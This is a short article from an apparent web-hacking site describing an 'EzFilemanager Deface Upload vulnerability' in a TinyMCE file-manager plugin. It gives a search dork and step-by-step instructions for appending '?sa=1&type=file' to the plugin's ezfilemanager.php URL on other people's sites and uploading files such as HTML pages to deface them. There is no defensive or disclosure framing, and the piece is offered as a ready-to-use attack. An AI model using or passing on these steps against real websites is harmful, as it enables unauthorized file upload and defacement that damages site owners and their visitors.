Main » Articles » Web Hacking » Exploits and Vulenrablities |
EzFilemanager Deface Upload vulnerability
(Modify this dork for getting more results from Google =) Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file Goto this URL : http://website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and put ?sa=1&type=file after URL Now URL will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
| |
Views: 947 | Rating: 3.5/2 |
Total comments: 0 | |